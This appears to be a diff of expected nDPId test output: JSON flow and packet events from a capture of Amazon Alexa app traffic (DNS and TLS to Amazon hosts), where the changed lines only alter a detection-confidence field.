+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1490976107359,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976107359,"pkt":"ePiC0\/vCAMDKkaPvCABFAABV3nRAAEARrymsECoBrBAq2AA1OIwAQbpsXSKBgAABAAEAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AAQ27x39"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -583,23 +583,23 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} 
-01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} 
+01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1490976114879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976114879,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWl1AAEARM1WsECrYrBAqAVG6ADUALQ0pp4sBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1490976114880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976114880,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR3zxAAEARrmWsECoBrBAq2AA1UboAPYqqp4uBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAoABDRe6IY="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
